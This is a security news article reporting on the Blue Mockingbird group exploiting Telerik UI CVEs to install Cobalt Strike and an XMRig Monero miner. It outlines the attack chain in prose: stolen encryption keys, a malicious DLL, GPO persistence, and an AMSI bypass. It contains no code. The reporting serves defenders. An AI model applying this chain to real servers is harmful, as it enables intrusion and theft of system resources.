‘Blue Mockingbird,’ a threat actor, exploits Telerik UI flaws to infiltrate servers, install Cobalt Strike beacons, and mine Monero by stealing system resources. The attacker used CVE-2019-18935, a critical severity (CVSS v3.1: 9.8) deserialization weakness in the Telerik UI framework for ASP.NET AJAX that encourages remote code execution.
In May 2020, the same threat actor was detected targeting vulnerable Microsoft IIS servers that utilized Telerik UI, even though it had been a year after the vendor had released security fixes. Surprisingly, Sophos researchers recently stated that, according to their detection data, Blue Mockingbird is still using the same vulnerabilities to perform attacks.
Attackers must first get the encryption keys that safeguard Telerik UI’s serialization on the target to exploit CVE-2019-18935. This may be done by employing CVE-2017-11317 and CVE-2017-11357 or exploiting another vulnerability in the target web app. Since many web apps were projects that incorporated the Telerik UI framework version available at the time of development and later were discontinued or forgotten about, there are still legitimate targets accessible for exploitation.
Once the keys have been obtained, the attackers can assemble a malicious DLL containing the deserialization code and launch it in the context of the ‘w3wp.exe’ process. Blue Mockingbird uses a readily available proof-of-concept (PoC) vulnerability to handle the encryption logic and automate DLL compilation in recent strikes discovered by Sophos. A Cobalt Strike beacon, a covert, legal penetration testing tool that Blue Mockingbird employs to execute encoded PowerShell instructions, was used in the latest cyberattacks as the payload.
Persistence is achieved by Active Directory Group Policy Objects (GPOs), which construct scheduled tasks in a new registry entry that contains base64-encoded PowerShell. To avoid Windows Defender detection, the script leverages typical AMSI-bypassing techniques to download and load a Cobalt Strike DLL into memory.
The second program (‘crby26td.exe’) is an XMRig Miner, a common open-source cryptocurrency miner for Monero, one of the least traceable cryptocurrencies. Notably, this was the major aim of the threat actor’s 2020 campaign; therefore, the attack chain, methodologies, and goals haven’t altered significantly.
On the other hand, Cobalt Strike allows for simple lateral movement within a compromised network, data exfiltration, account takeover, and the deployment of more powerful payloads like ransomware. It’s unclear whether Blue Mockingbird is interested in investigating these possibilities; for the time being, they’re only focused on Monero mining.